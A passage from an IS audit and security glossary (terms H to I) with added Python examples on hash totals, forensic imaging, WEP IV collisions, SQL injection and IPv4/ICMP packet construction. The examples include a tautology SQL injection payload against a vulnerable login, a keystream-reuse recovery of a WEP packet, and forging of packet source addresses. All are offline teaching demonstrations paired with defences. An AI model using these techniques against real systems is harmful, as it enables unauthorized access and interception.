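RECORDS = [(101, 250000), (102, 180000), (103, 99500), (104, 420000)]


def serialise(records):
    """Canonical bytes so an identical batch always hashes identically."""
    return "\n".join(f"{rid},{amount}" for rid, amount in sorted(records)).encode()


def sha256_hex(data):
    """Cryptographic hash: fixed-size digest, infeasible to invert or to collide."""
    return hashlib.sha256(data).hexdigest()


def hash_total(records):
    """The glossary's 'hash total': a plain control total of one numeric field."""
    return sum(amount for _, amount in records)


def bit_difference(hex_a, hex_b):
    """Count of differing bits between two equal-length hex digests."""
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def verify_batch(records, expected_total, expected_digest):
    """Run both integrity checks against values recorded when the batch was sent."""
    return {
        "hash_total_ok": hash_total(records) == expected_total,
        "digest_ok": sha256_hex(serialise(records)) == expected_digest,
    }


def demo():
    """Three tamperings of the constructed batch and what each check reports."""
    total = hash_total(RECORDS)
    digest = sha256_hex(serialise(RECORDS))

    dropped = RECORDS[:-1]                                    # a record lost in transfer
    swapped = [(101, 180000), (102, 250000)] + RECORDS[2:]    # amounts moved between payees
    original = serialise(RECORDS)
    one_bit = bytes([original[0] ^ 0x01]) + original[1:]      # a single flipped bit

    return {
        "dropped": verify_batch(dropped, total, digest),
        "swapped": verify_batch(swapped, total, digest),
        "one_bit_flip_changes_bits": bit_difference(digest, sha256_hex(one_bit)),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The `swapped` case is the instructive one: moving money between two payees leaves the hash total untouched, so a batch control alone passes it, while the digest fails. Neither check authenticates the sender; a plain hash travelling with the data can be recomputed by whoever altered the data, which is the gap that keyed hashes and digital signatures (see Electronic signature above) close.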
Help desk
A service offered via telephone/Internet by an enterprise to its clients or employees that provides information, assistance and troubleshooting advice regarding software, hardware or networks.
Scope Note: A help desk is staffed by people who can either resolve the problem on their own or escalate the problem to specialized personnel. A help desk is often equipped with dedicated customer relationship management (CRM) software that logs the problems and tracks them until they are solved.

Heuristic filter
A method often employed by anti-spam software to filter spam using criteria established in a centralized rule database
Scope Note: Every email message is given a rank, based on its header and contents, which is then matched against preset thresholds. A message that surpasses the threshold will be flagged as spam and discarded, returned to its sender or put in a spam directory for further review by the intended recipient.

Hexadecimal
A numbering system that uses a base of 16 and uses 16 digits: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E and F. Programmers use hexadecimal numbers as a convenient way of representing binary numbers.

Hierarchical database
A database structured in a tree/root or parent/child relationship
Scope Note: Each parent can have many children, but each child may have only one parent.

Hijacking
An exploitation of a valid network session for unauthorized purposes
Honeypot
A specially configured server, also known as a decoy server, designed to attract and monitor intruders in a manner such that their actions do not affect production systems
Scope Note: Also known as "decoy server"

Horizontal defense in depth
Controls are placed in various places in the path to access an asset (this is functionally equivalent to the concentric ring model above).

Hot site
A fully operational offsite data processing facility equipped with both hardware and system software to be used in the event of a disaster

Hub
A common connection point for devices in a network; hubs are used to connect segments of a local area network (LAN)
Scope Note: A hub contains multiple ports. When a packet arrives at one port, it is copied to the other ports so that all segments of the LAN can see all packets.

Human firewall
A person prepared to act as a network layer of defense through education and awareness

Hurdle rate
Also known as required rate of return, above which an investment makes sense and below which it does not
Scope Note: Often based on the cost of capital, plus or minus a risk premium, and often varied based on prevailing economic conditions

Hybrid application controls
Consist of a combination of manual and automated activities, all of which must operate for the control to be effective
Scope Note: Sometimes referred to as computer-dependent application controls

Hyperlink
An electronic pathway that may be displayed in the form of highlighted text, graphics or a button that connects one web page with another web page address

Hypertext
A language that enables electronic documents that present information to be connected by links instead of being presented sequentially, as is the case with normal text

Hypertext Markup Language (HTML)
A language designed for the creation of web pages with hypertext and other information to be displayed in a web browser; used to structure information, denoting certain text as headings, paragraphs and lists, and can be used to describe, to some degree, the appearance and semantics of a document

Hypertext Transfer Protocol Secure (HTTPS)
A protocol for accessing a secure web server, whereby all data transferred are encrypted.

Hypertext Transfer Protocol (HTTP)
A communication protocol used to connect to servers on the World Wide Web. Its primary function is to establish a connection with a web server and transmit hypertext markup language (HTML), extensible markup language (XML) or other pages to client browsers

Identity access management (IAM)
Encapsulates people, processes and products to identify and manage the data used in an information system to authenticate users and grant or deny access rights to data and system resources. The goal of IAM is to provide appropriate access to enterprise resources.
Idle standby
A failover process in which the primary node owns the resource group and the backup node runs idle, only supervising the primary node
Scope Note: In case of a primary node outage, the backup node takes over. The nodes are prioritized, which means that the surviving node with the highest priority will acquire the resource group. A higher-priority node joining the cluster will thus cause a short service interruption.

IEEE (Institute of Electrical and Electronics Engineers)
Pronounced I-triple-E; IEEE is an organization composed of engineers, scientists and students
Scope Note: Best known for developing standards for the computer and electronics industry

IEEE 802.11
A family of specifications developed by the Institute of Electrical and Electronics Engineers (IEEE) for wireless local area network (WLAN) technology. 802.11 specifies an over-the-air interface between a wireless client and a base station or between two wireless clients.

Image processing
The process of electronically inputting source documents by taking an image of the document, thereby eliminating the need for key entry

Imaging
A process that allows one to obtain a bit-for-bit copy of data to avoid damage of original data or information when multiple analyses may be performed.
Scope Note: The imaging process is made to obtain residual data, such as deleted files, fragments of deleted files and other information present, from the disk for analysis. This is possible because imaging duplicates the disk surface, sector by sector.
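An added example (not from the glossary) of the difference the Scope Note draws between a sector-by-sector image and an ordinary copy. A toy disk is constructed in memory with a live file and the first bytes of a deleted photo left in an unallocated sector; the sector size, the allocation-table format and the file contents are assumptions of the example:

```python
"""Added example: why a forensic image is taken sector by sector. A toy
"disk" is constructed in memory with a live file and the remains of a deleted
JPEG in an unallocated sector. A logical copy (allocated sectors only) loses
the residue; a bit-for-bit image keeps it, and its hash proves it matches the
original. The disk layout and the allocation table format are assumptions."""
import hashlib

SECTOR = 512

# Magic numbers used for carving: real file signatures, looked up in unallocated space.
SIGNATURES = {
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "zip": b"PK\x03\x04",
}


def make_sample_disk() -> bytes:
    """Constructed 8-sector disk. Sector 0 is a toy allocation table listing the
    sectors the file system still considers in use; sectors 2 and 3 hold a live
    file; sector 5 holds the first bytes of a photo that was 'deleted' (its
    allocation entry removed) but never overwritten."""
    disk = bytearray(8 * SECTOR)
    disk[0:SECTOR] = b"ALLOC:2,3".ljust(SECTOR, b"\x00")
    disk[2 * SECTOR:3 * SECTOR] = b"quarterly report, part 1".ljust(SECTOR, b"\x00")
    disk[3 * SECTOR:4 * SECTOR] = b"quarterly report, part 2".ljust(SECTOR, b"\x00")
    residue = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b" ...rest of a deleted photo..."
    disk[5 * SECTOR:5 * SECTOR + len(residue)] = residue
    return bytes(disk)


def allocated_sectors(disk: bytes) -> set:
    """Parse the toy allocation table in sector 0."""
    entry = disk[:SECTOR].rstrip(b"\x00")
    return {int(n) for n in entry[len(b"ALLOC:"):].split(b",") if n}


def image_disk(disk: bytes) -> bytes:
    """Bit-for-bit image: every sector is copied, allocated or not."""
    out = bytearray()
    for off in range(0, len(disk), SECTOR):
        out += disk[off:off + SECTOR]
    return bytes(out)


def logical_copy(disk: bytes) -> bytes:
    """What a file-level backup captures: only sectors the file system lists."""
    return b"".join(disk[n * SECTOR:(n + 1) * SECTOR] for n in sorted(allocated_sectors(disk)))


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def carve(data: bytes, skip: set = frozenset()):
    """Look for file signatures in sectors not in `skip`; returns (sector, kind, byte offset)."""
    hits = []
    for n in range(len(data) // SECTOR):
        if n in skip:
            continue
        chunk = data[n * SECTOR:(n + 1) * SECTOR]
        for kind, magic in SIGNATURES.items():
            idx = chunk.find(magic)
            if idx != -1:
                hits.append((n, kind, n * SECTOR + idx))
    return hits


if __name__ == "__main__":
    disk = make_sample_disk()
    img = image_disk(disk)
    print("image hash matches original:", sha256(img) == sha256(disk))
    print("residue found in image:", carve(img, allocated_sectors(img)))
    print("residue found in logical copy:", carve(logical_copy(disk)))
```

The hash comparison is the check a practitioner records before any analysis: it proves the image is the bit-for-bit copy the entry defines, and every later analysis runs against the image rather than the original.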
Impact
Magnitude of loss resulting from a threat exploiting a vulnerability

Impact analysis
A study to prioritize the criticality of information resources for the enterprise based on costs (or consequences) of adverse events
In an impact analysis, threats to assets are identified and potential business losses determined for different time periods. This assessment is used to justify the extent of safeguards that are required and recovery time frames. This analysis is the basis for establishing the recovery strategy.

Impact assessment
A review of the possible consequences of a risk
Scope Note: See also Impact analysis.

Impairment
A condition that causes a weakness or diminished ability to execute audit objectives
Scope Note: Impairment to organizational independence and individual objectivity may include personal conflict of interest; scope limitations; restrictions on access to records, personnel, equipment, or facilities; and resource limitations (such as funding or staffing).
Impersonation
A security concept related to Windows NT that allows a server application to temporarily "be" the client in terms of access to secure objects
Scope Note: Impersonation has three possible levels: identification, letting the server inspect the client's identity; impersonation, letting the server act on behalf of the client; and delegation, the same as impersonation but extended to remote systems to which the server connects (through the preservation of credentials). Impersonation by imitating or copying the identification, behavior or actions of another may also be used in social engineering to obtain otherwise unauthorized physical access.

Implement
In business, includes the full economic life cycle of the investment program through retirement (i.e., when the full expected value of the investment is realized, as much value as is deemed possible has been realized, or it is determined that the expected value cannot be realized and the program is terminated)

Implementation life cycle review
Refers to the controls that support the process of transformation of the enterprise's legacy information systems into the enterprise resource planning (ERP) applications
Scope Note: Largely covers all aspects of systems implementation and configuration, such as change management

Incident
Any event that is not part of the standard operation of a service and that causes, or may cause, an interruption to, or a reduction in, the quality of that service

Incident response
The response of an enterprise to a disaster or other significant event that may significantly affect the enterprise, its people, or its ability to function productively
An incident response may include evacuation of a facility, initiating a disaster recovery plan (DRP), performing damage assessment, and any other measures necessary to bring an enterprise to a more stable status.

Incident response plan
The operational component of incident management
Scope Note: The plan includes documented procedures and guidelines for defining the criticality of incidents, reporting and escalation process, and recovery procedures.

Inconsequential deficiency
A deficiency is inconsequential if a reasonable person would conclude, after considering the possibility of further undetected deficiencies, that the deficiencies, either individually or when aggregated with other deficiencies, would clearly be trivial to the subject matter. If a reasonable person could not reach such a conclusion regarding a particular deficiency, that deficiency is more than inconsequential.

Incremental testing
Deliberately testing only the value-added functionality of a software component

Independence
1. Self-governance
2. The freedom from conditions that threaten objectivity or the appearance of objectivity. Such threats to objectivity must be managed at the individual auditor, engagement, functional and organizational levels. Independence includes independence of mind and independence in appearance.
Scope Note: See Independence of mind and Independence in appearance.
Independence in appearance
The avoidance of facts and circumstances that are so significant that a reasonable and informed third party would be likely to conclude, weighing all the specific facts and circumstances, that a firm's, audit function's, or a member of the audit team's integrity, objectivity or professional skepticism has been compromised.

Independence of mind
The state of mind that permits the expression of a conclusion without being affected by influences that compromise professional judgement, thereby allowing an individual to act with integrity and exercise objectivity and professional skepticism.

Independent appearance
The outward impression of being self-governing and free from conflict of interest and undue influence

Independent attitude
Impartial point of view which allows an IS auditor to act objectively and with fairness

Indexed Sequential Access Method (ISAM)
A disk access method that stores data sequentially while also maintaining an index of key fields to all the records in the file for direct access capability

Indexed sequential file
A file format in which records are organized, and can be accessed, according to a pre-established key that is part of the record

Information
An asset that, like other important business assets, is essential to an enterprise's business. It can exist in many forms. It can be printed or written on paper, stored electronically, transmitted by post or by using electronic means, shown on films, or spoken in conversation.
Scope Note: COBIT 5 perspective

Information architecture
Information architecture is one component of IT architecture (together with applications and technology)

Information criteria
Attributes of information that must be satisfied to meet business requirements

Information engineering
Data-oriented development techniques that work on the premise that data are at the center of information processing and that certain data relationships are significant to a business and must be represented in the data structure of its systems

Information processing facility (IPF)
The computer room and support areas

Information security
Ensures that within the enterprise, information is protected against disclosure to unauthorized users (confidentiality), improper modification (integrity), and non-access when required (availability)

Information security governance
The set of responsibilities and practices exercised by the board and executive management with the goal of providing strategic direction, ensuring that objectives are achieved, ascertaining that risk is managed appropriately and verifying that the enterprise's resources are used responsibly

Information security program
The overall combination of technical, operational and procedural measures and management structures implemented to provide for the confidentiality, integrity and availability of information based on business requirements and risk analysis
Information systems (IS)
The combination of strategic, managerial and operational activities involved in gathering, processing, storing, distributing and using information and its related technologies
Scope Note: Information systems are distinct from information technology (IT) in that an information system has an IT component that interacts with the process components.

Information technology (IT)
The hardware, software, communication and other facilities used to input, store, process, transmit and output data in whatever form

Informed
In a RACI chart (Responsible, Accountable, Consulted, Informed), Informed refers to those people who are kept up to date on the progress of an activity (one-way communication)

Infrastructure as a Service (IaaS)
Offers the capability to provision processing, storage, networks and other fundamental computing resources, enabling the customer to deploy and run arbitrary software, which can include operating systems (OSs) and applications

Ingestion
A process to convert information extracted to a format that can be understood by investigators.
Scope Note: See also Normalization.

Ingress
Network communications coming in

Inherent risk
The risk level or exposure without taking into account the actions that management has taken or might take (e.g., implementing controls)

Inheritance (objects)
Database structures that have a strict hierarchy (no multiple inheritance)
Inheritance can instantiate other objects irrespective of the class hierarchy; thus there is no strict hierarchy of objects.

Initial program load (IPL)
The initialization procedure that causes an operating system to be loaded into storage at the beginning of a workday or after a system malfunction.
Initialization vector (IV) collisions
A major concern is the way that wired equivalent privacy (WEP) allocates the RC4 initialization vectors (IVs) used to create the keys that are used to drive a pseudorandom number generator that is eventually used for encryption of the wireless data traffic. The IV in WEP is a 24-bit field, a small space that practically guarantees reuse, resulting in key reuse. The WEP standard also fails to specify how these IVs are assigned. Many wireless network cards reset these IVs to zero and then increment them by one for every use. If an attacker can capture two packets using the same IV (the same key if the key has not been changed), mechanisms can be used to determine portions of the original packets. This and other weaknesses result in key reuse, resulting in susceptibility to attacks to determine the keys used. These attacks require a large number of packets (5 to 6 million) to actually fully derive the WEP key, but on a large, busy network this can occur in a short time, perhaps in as quickly as 10 minutes (although even some of the largest corporate networks will likely require much more time than this to gather enough packets). In WEP-protected wireless networks, many times multiple, or all, stations use the same shared key. This increases the chances of IV collisions greatly. The result of this is
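The sentence "mechanisms can be used to determine portions of the original packets" is shown concretely below, as an added example that is not part of the glossary. RC4 and the WEP per-packet key (24-bit IV prepended to the shared key) are implemented as the entry describes; the 40-bit shared key, the two stations and their packets are constructed. Both stations behave like the cards in the text (IV reset to zero, incremented per packet), so their first packets share a keystream. The CRC-32 integrity value that real WEP appends before encryption is left out; it does not affect the keystream-reuse argument:

```python
"""Added example: what an IV collision costs in WEP. RC4 and the WEP
per-packet key (24-bit IV prepended to the shared key) are implemented as the
glossary describes; the shared key, the two stations and their packets are
constructed. Both stations behave like the cards in the text (IV reset to
zero, incremented per packet), so their first packets reuse the same
keystream, and an attacker who knows one plaintext reads the other. The
CRC-32 integrity value real WEP appends is omitted; it does not change the
keystream-reuse argument."""


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Plain RC4: key-scheduling algorithm, then n bytes of PRGA output."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: int, plaintext: bytes):
    """WEP per-packet key = IV || shared key. The IV travels in the clear, so an
    eavesdropper can tell which packets share a keystream."""
    iv_bytes = iv.to_bytes(3, "big")          # 24-bit IV field
    keystream = rc4_keystream(iv_bytes + shared_key, len(plaintext))
    return iv_bytes, xor(plaintext, keystream)


class Station:
    """Models a card that resets its IV to zero and increments it per packet."""

    def __init__(self, shared_key: bytes):
        self.key = shared_key
        self.next_iv = 0

    def send(self, plaintext: bytes):
        iv, ct = wep_encrypt(self.key, self.next_iv, plaintext)
        self.next_iv = (self.next_iv + 1) % (1 << 24)   # wraps after 2^24 packets
        return iv, ct


def recover_same_iv(c_known: bytes, p_known: bytes, c_target: bytes) -> bytes:
    """Attacker step: c_known XOR p_known gives the keystream for that IV;
    XOR with another ciphertext under the same IV gives its plaintext (up to
    the length of the known plaintext)."""
    keystream = xor(c_known, p_known)
    return xor(c_target, keystream)


def iv_collisions(ivs_a, ivs_b) -> int:
    """How many IVs two stations on the same shared key have in common."""
    return len(set(ivs_a) & set(ivs_b))


# Constructed values. The 8-byte LLC/SNAP header that begins every IP-carrying
# 802.11 data frame is a real, predictable plaintext prefix attackers rely on.
SHARED_KEY = bytes.fromhex("0102030405")          # 40-bit WEP key (constructed)
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")
P_KNOWN = LLC_SNAP_IP + b"ping"                    # e.g. traffic the attacker provoked
P_SECRET = LLC_SNAP_IP + b"password=hunter2"


def demo():
    alice, bob = Station(SHARED_KEY), Station(SHARED_KEY)
    iv_a, c_a = alice.send(P_KNOWN)    # both cards start at IV 0 ...
    iv_b, c_b = bob.send(P_SECRET)     # ... so the very first packets collide
    recovered = recover_same_iv(c_a, P_KNOWN, c_b) if iv_a == iv_b else b""
    return iv_a, iv_b, recovered


if __name__ == "__main__":
    iv_a, iv_b, recovered = demo()
    print("IV A:", iv_a.hex(), "IV B:", iv_b.hex(), "recovered:", recovered)
    print("collisions between two stations sending 1000 packets each:",
          iv_collisions(range(1000), range(1000)))
```

The attacker never learns the shared key here; keystream reuse alone is enough to read the second packet up to the length of the known plaintext, and the known 8-byte LLC/SNAP prefix means that much of every frame is always recoverable once an IV repeats.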
Injection
A general term for attack types which consist of injecting code that is then interpreted/executed by the application. (OWASP)
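The SQL form of injection, as an added example (not from the glossary or from OWASP): the vulnerable query beside its hardened form, run against an in-memory SQLite database. The table, its rows and the login function are constructed for the demonstration:

```python
"""Added example: the SQL flavour of injection, shown as the vulnerable query
beside its hardened form. The schema, the rows and the login function are
constructed for the demonstration and run against an in-memory SQLite
database; the payload is the classic quote-escape that turns the WHERE
clause into a tautology."""
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return con


def login_vulnerable(con, name: str, pw: str):
    """User input is pasted into the statement text, so a quote in the input
    ends the string literal and the rest is interpreted as SQL."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}' AND pw = '{pw}'"
    return con.execute(sql).fetchone()


def login_safe(con, name: str, pw: str):
    """Parameterized query: the driver sends the statement and the values
    separately, so the input is only ever compared as data."""
    sql = "SELECT name, role FROM users WHERE name = ? AND pw = ?"
    return con.execute(sql, (name, pw)).fetchone()


PAYLOAD = "' OR '1'='1"   # closes the pw literal; WHERE becomes (...) OR '1'='1'


def demo():
    con = make_db()
    return {
        "legit_safe": login_safe(con, "bob", "hunter2"),
        "bypass_vulnerable": login_vulnerable(con, "alice", PAYLOAD),
        "bypass_safe": login_safe(con, "alice", PAYLOAD),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

The same pattern applies to every interpreter named by the OWASP definition (shell, LDAP, XPath, template engines): the fix is always to keep data out of the code channel, here by binding parameters rather than escaping them.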
Input control
Techniques and procedures used to verify, validate and edit data to ensure that only correct data are entered into the computer

Inputs and outputs
The process work products/artifacts considered necessary to support operation of the process
Scope Note: Inputs and outputs enable key decisions, provide a record and audit trail of process activities, and enable follow-up in the event of an incident. They are defined at the key management practice level, may include some work products used only within the process and are often essential inputs to other processes. The illustrative COBIT 5 inputs and outputs should not be regarded as an exhaustive list since additional information flows could be defined depending on a particular enterprise's environment and process framework.
COBIT 5 perspective

Instant messaging (IM)
An online mechanism or a form of real-time communication between two or more people based on typed text and multimedia data
Scope Note: Text is conveyed via computers or another electronic device (e.g., cellular phone or handheld device) connected over a network, such as the Internet.

Intangible asset
An asset that is not physical in nature
Scope Note: Examples include: intellectual property (patents, trademarks, copyrights, processes), goodwill, and brand recognition

Integrated services digital network (ISDN)
A public end-to-end digital telecommunications network with signaling, switching and transport capabilities supporting a wide range of services accessed by standardized interfaces with integrated customer control
Scope Note: The standard allows transmission of digital voice, video and data over 64 Kbps lines.

Integrated test facilities (ITF)
A testing methodology in which test data are processed in production systems
Scope Note: The data usually represent a set of fictitious entities such as departments, customers or products. Output reports are verified to confirm the correctness of the processing.

Integrity
The guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity

Intellectual property
Intangible assets that belong to an enterprise for its exclusive use
Scope Note: Examples include: patents, copyrights, trademarks, ideas, and trade secrets.

Interface testing
A testing technique that is used to evaluate output from one application while the information is sent as input to another application

Internal control environment
The relevant environment on which the controls have effect
Internal control over financial reporting
A process designed by, or under the supervision of, the registrant's principal executive and principal financial officers, or persons performing similar functions, and effected by the registrant's board of directors, management and other personnel to provide reasonable assurance regarding the reliability of financial reporting and the preparation of financial statements for external purposes in accordance with generally accepted accounting principles.
Includes those policies and procedures that:
- Pertain to the maintenance of records that in reasonable detail accurately and fairly reflect the transactions and dispositions of the assets of the registrant
- Provide reasonable assurance that transactions are recorded as necessary to permit preparation of financial statements in accordance with generally accepted accounting principles, and that receipts and expenditures of the registrant are being made only in accordance with authorizations of management and directors of the registrant
- Provide reasonable assurance regarding prevention or timely detection of unauthorized acquisition, use or disposition of the registrant's assets that could have a material effect on the financial statements

Internal control structure
The dynamic, integrated processes effected by the governing body, management and all other staff that are designed to provide reasonable assurance regarding the achievement of the following general objectives:
- Effectiveness, efficiency and economy of operations
- Reliability of management
- Compliance with applicable laws, regulations and internal policies
Management's strategies for achieving these general objectives are affected by the design and operation of the following components:
- Control environment
- Information system
- Control procedures

Internal controls
The policies, procedures, practices and organizational structures designed to provide reasonable assurance that business objectives will be achieved and undesired events will be prevented or detected and corrected

Internal penetrators
Authorized user of a computer system who oversteps his/her legitimate access rights
Scope Note: This category is divided into masqueraders and clandestine users.

Internal rate of return (IRR)
The discount rate that equates an investment cost with its projected earnings
Scope Note: When discounted at the IRR, the present value of the cash outflow will equal the present value of the cash inflow. The IRR and net present value (NPV) are measures of the expected profitability of an investment project.
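A worked computation of the IRR and NPV relationship in the Scope Note, added here as an example that is not part of the glossary. NPV follows the definition above; the IRR is found numerically by bisection on the discount rate at which NPV crosses zero, and the result is compared with a hurdle rate as the "Hurdle rate" entry describes. The cash flows are constructed:

```python
"""Added example: computing IRR numerically and comparing it with a hurdle
rate. NPV is the glossary's definition; the IRR is found by bisection on the
discount rate where NPV crosses zero. The cash flows are constructed."""


def npv(rate: float, cash_flows) -> float:
    """Net present value: period-0 flow undiscounted, later flows divided by (1+rate)^t."""
    return sum(cf / (1.0 + rate) ** t for t, cf in enumerate(cash_flows))


def irr(cash_flows, lo: float = -0.99, hi: float = 10.0, tol: float = 1e-10) -> float:
    """Bisection: assumes one sign change in the flows (an outlay followed by
    inflows), so NPV is monotonic in the rate and exactly one root lies in [lo, hi]."""
    f_lo, f_hi = npv(lo, cash_flows), npv(hi, cash_flows)
    if f_lo * f_hi > 0:
        raise ValueError("NPV does not change sign on the bracket; no single IRR")
    for _ in range(200):
        mid = (lo + hi) / 2
        f_mid = npv(mid, cash_flows)
        if abs(f_mid) < tol:
            lo = hi = mid
            break
        if f_lo * f_mid < 0:
            hi, f_hi = mid, f_mid
        else:
            lo, f_lo = mid, f_mid
    return (lo + hi) / 2


def accept(cash_flows, hurdle_rate: float) -> bool:
    """Invest only if the project's IRR clears the required rate of return."""
    return irr(cash_flows) > hurdle_rate


# Constructed project: a 1000 outlay followed by three annual inflows of 400.
PROJECT = [-1000.0, 400.0, 400.0, 400.0]

if __name__ == "__main__":
    r = irr(PROJECT)
    print(f"IRR = {r:.4%}, NPV at IRR = {npv(r, PROJECT):.2e}")
    print("accept at 8% hurdle:", accept(PROJECT, 0.08), "at 12%:", accept(PROJECT, 0.12))
```

The ValueError branch is the caveat worth remembering: cash flows that change sign more than once can have several rates at which NPV is zero, and a single IRR is then not a meaningful decision measure; NPV at the hurdle rate still is.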
Internal storage
The main memory of the computer's central processing unit (CPU)

International Organization for Standardization (ISO)
The world's largest developer of voluntary International Standards
Internet
1. Two or more networks connected by a router
2. The world's largest network using Transmission Control Protocol/Internet Protocol (TCP/IP) to link government, university and commercial institutions

Internet Assigned Numbers Authority (IANA)
Responsible for the global coordination of the DNS root, IP addressing, and other Internet protocol resources

Internet banking
Use of the Internet as a remote delivery channel for banking services
Scope Note: Services include traditional ones, such as opening an account or transferring funds to different accounts, and new banking services, such as electronic bill presentment and payment (allowing customers to receive and pay bills on a bank's web site).

Internet Control Message Protocol (ICMP)
A protocol that allows systems to communicate information about the state of services on other systems
Scope Note: For example, ICMP is used in determining whether systems are up, maximum packet sizes on links, and whether a destination host/network/port is available. Hackers typically use (abuse) ICMP to determine information about the remote site.

Internet Engineering Task Force (IETF)
An organization with international affiliates as network industry representatives that sets Internet standards. This includes all network industry developers and researchers concerned with the evolution and planned growth of the Internet.

Internet Inter-ORB Protocol (IIOP)
Developed by the Object Management Group (OMG) to implement Common Object Request Broker Architecture (CORBA) solutions over the World Wide Web
Scope Note: CORBA enables modules of network-based programs to communicate with one another. These modules or program parts, such as tables, arrays, and more complex program subelements, are referred to as objects. Use of IIOP in this process enables browsers and servers to exchange both simple and complex objects. This differs significantly from Hypertext Transfer Protocol (HTTP), which transfers documents rather than typed objects.

Internet protocol (IP)
Specifies the format of packets and the addressing scheme

Internet Protocol (IP) packet spoofing
An attack using packets with spoofed source Internet Protocol (IP) addresses.
Scope Note: This technique exploits applications that use authentication based on IP addresses. This technique also may enable an unauthorized user to gain root access on the target system.
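An added example serving both the ICMP entry and the IP packet spoofing entry above; it is not code from the glossary. An IPv4 header and an ICMP echo request are built and parsed offline with the RFC 1071 Internet checksum, and the same builder is then given an arbitrary source address to show why a check based on the source address alone is not authentication. All addresses, identifiers and the trusted-address set are constructed; nothing is transmitted:

```python
"""Added example covering the ICMP entry and the IP packet spoofing entry: an
IPv4 header and an ICMP echo request are built and parsed with the RFC 1071
Internet checksum, and the builder is then handed an arbitrary source address
to show why a check based only on the packet's source address is not
authentication. Addresses and identifiers are constructed; nothing is sent."""
import socket   # used only for inet_aton/inet_ntoa text<->binary conversion
import struct

ICMP_ECHO_REQUEST = 8
IPPROTO_ICMP = 1


def internet_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit words, then complemented.
    Over a packet that already carries a correct checksum the result is 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(ident: int, seq: int, payload: bytes = b"") -> bytes:
    hdr = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = internet_checksum(hdr + payload)
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def build_ipv4(src: str, dst: str, payload: bytes, proto: int = IPPROTO_ICMP,
               ttl: int = 64, ident: int = 0x1234) -> bytes:
    """Minimal 20-byte IPv4 header. src is just a field the sender fills in:
    nothing in the packet proves the sender owns that address."""
    total_len = 20 + len(payload)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, 0, ttl, proto,
                      0, socket.inet_aton(src), socket.inet_aton(dst))
    csum = internet_checksum(hdr)
    return hdr[:10] + struct.pack("!H", csum) + hdr[12:] + payload


def parse_ipv4(pkt: bytes) -> dict:
    ver_ihl, _tos, total_len, _ident, _frag, ttl, proto, _csum, src, dst = \
        struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    return {
        "version": ver_ihl >> 4,
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
        "proto": proto,
        "ttl": ttl,
        "header_ok": internet_checksum(pkt[:ihl]) == 0,
        "payload": pkt[ihl:total_len],
    }


def parse_icmp(data: bytes) -> dict:
    typ, code, _csum, ident, seq = struct.unpack("!BBHHH", data[:8])
    return {"type": typ, "code": code, "ident": ident, "seq": seq,
            "checksum_ok": internet_checksum(data) == 0, "payload": data[8:]}


def source_address_allows(pkt: bytes, trusted: set) -> bool:
    """The weak check the Scope Note warns about: trust by source IP alone."""
    return parse_ipv4(pkt)["src"] in trusted


if __name__ == "__main__":
    echo = build_icmp_echo(0x4242, 1, b"hello")
    honest = build_ipv4("203.0.113.5", "192.0.2.10", echo)
    spoofed = build_ipv4("192.0.2.1", "192.0.2.10", echo)   # claims a trusted address
    for pkt in (honest, spoofed):
        print(parse_ipv4(pkt)["src"], "allowed:", source_address_allows(pkt, {"192.0.2.1"}))
```

The checksum only detects accidental corruption; it is recomputed by whoever builds the packet, so it offers no protection against a forged source address. That is why address-based trust has to be replaced by cryptographic authentication (the IPsec Authentication Header entry later in this glossary is one answer).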
Internet service provider (ISP)
A third party that provides individuals and enterprises with access to the Internet and a variety of other Internet-related services

Internetwork Packet Exchange/Sequenced Packet Exchange (IPX/SPX)
IPX is the layer 3 (network) protocol of the open systems interconnect (OSI) model; SPX is the layer 4 transport protocol. The SPX layer sits on top of the IPX layer and provides connection-oriented services between two nodes on the network.
Interrogation
Used to obtain prior indicators or relationships, including telephone numbers, IP addresses and names of individuals, from extracted data

Interruption window
The time that the company can wait from the point of failure to the restoration of the minimum and critical services or applications
After this time, the progressive losses caused by the interruption are excessive for the enterprise.

Intranet
A private network that uses the infrastructure and standards of the Internet and World Wide Web, but is isolated from the public Internet by firewall barriers

Intruder
Individual or group gaining access to the network and its resources without permission

Intrusion
Any event during which unauthorized access occurs

Intrusion detection
The process of monitoring the events occurring in a computer system or network to detect signs of unauthorized access or attack

Intrusion detection system (IDS)
Inspects network and host security activity to identify suspicious patterns that may indicate a network or system attack

Intrusion prevention
